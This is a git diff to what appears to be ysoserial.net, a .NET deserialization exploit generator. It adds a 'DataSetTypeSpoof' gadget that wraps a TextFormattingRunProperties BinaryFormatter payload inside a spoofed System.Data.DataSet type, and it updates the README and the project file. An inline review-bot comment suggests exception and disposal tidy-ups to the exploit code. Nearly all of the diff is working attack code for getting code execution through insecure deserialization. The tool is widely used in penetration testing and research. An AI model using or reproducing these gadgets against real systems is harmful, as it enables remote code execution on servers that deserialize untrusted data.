diff --git a/README.md b/README.md
index 9683591..bc0533b 100644
--- a/README.md
+++ b/README.md
@@ -46,6 +46,8 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) DataSet
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
+ (*) DataSetTypeSpoof
+ Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
(*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
diff --git a/ysoserial/Generators/DataSetTypeSpoofGenerator.cs b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
new file mode 100644
index 0000000..7c16631
--- /dev/null
+++ b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Data;
+using System.IO;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+ public class DataSetTypeSpoofGenerator : DataSetGenerator
+ {
+ public override string Name()
+ {
+ return "DataSetTypeSpoof";
+ }
+
+ public override string Contributors()
+ {
+ return "Soroush Dalili, Markus Wulftange, Jang";
+ }
+
+ public override object Generate(string formatter, InputArgs inputArgs)
+ {
+ byte[] init_payload =
+ (byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
+ DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
+ if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
+ || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
+ || formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
+ {
+ return Serialize(payloadDataSetMarshal, formatter, inputArgs);
+ }
+ else
+ {
+ throw new Exception("Formatter not supported");
+ }
+ }
+ }
+
+ // https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
+ [Serializable]
+ public class DataSetSpoofMarshal : ISerializable
+ {
+ byte[] _fakeTable;
+
+ public void GetObjectData(SerializationInfo info, StreamingContext context)
+ {
+ // info.SetType(typeof(System.Data.DataSet));
+ info.AssemblyName = "mscorlib";
+ info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
+ info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
+ info.AddValue("DataSet.DataSetName", "");
+ info.AddValue("DataSet.Namespace", "");
+ info.AddValue("DataSet.Prefix", "");
+ info.AddValue("DataSet.CaseSensitive", false);
+ info.AddValue("DataSet.LocaleLCID", 0x409);
+ info.AddValue("DataSet.EnforceConstraints", false);
+ info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
+ info.AddValue("DataSet.Tables.Count", 1);
+ info.AddValue("DataSet.Tables_0", _fakeTable);
+ }
+
+ public void SetFakeTable(byte[] bfPayload)
+ {
+ _fakeTable = bfPayload;
+ }
+
+ public DataSetSpoofMarshal(byte[] bfPayload)
+ {
+ SetFakeTable(bfPayload);
+ }
+
+ public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
+ {
+ // This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
+ }
+
+ public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
+ {
+ MemoryStream stm = new MemoryStream();
+ if (inputArgs.Minify)
+ {
+ ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
+ new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
+ fmtLocal.Serialize(stm, fakeTable);
+ }
+ else
+ {
+ BinaryFormatter fmt = new BinaryFormatter();
+ fmt.Serialize(stm, fakeTable);
+ }
+
+ SetFakeTable(stm.ToArray());
+ }
+
+ public DataSetSpoofMarshal(MemoryStream ms)
+ {
+ SetFakeTable(ms.ToArray());
+ }
+ }
+}
\ No newline at end of file
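Review bot: `Generate` rejects an unknown formatter with a bare `new Exception("Formatter not supported")`, which callers cannot catch selectively and which drops the offending value; prefer `throw new NotSupportedException($"Formatter not supported: {formatter}");` unless the base `DataSetGenerator` deliberately uses the generic form and consistency with it is wanted. In the `(object fakeTable, InputArgs inputArgs)` constructor the `MemoryStream` is never disposed and `inputArgs` is dereferenced without a null check; wrapping the stream as `using (MemoryStream stm = new MemoryStream())` and adding a guard on `inputArgs` would fix both. The commented-out `// info.SetType(typeof(System.Data.DataSet));` in `GetObjectData` is dead code and should be removed or accompanied by a one-line comment saying why it was left. `System.Collections.Generic` appears to be unused in this file.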
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
index 628729e..f792221 100755
--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -158,6 +158,7 @@
+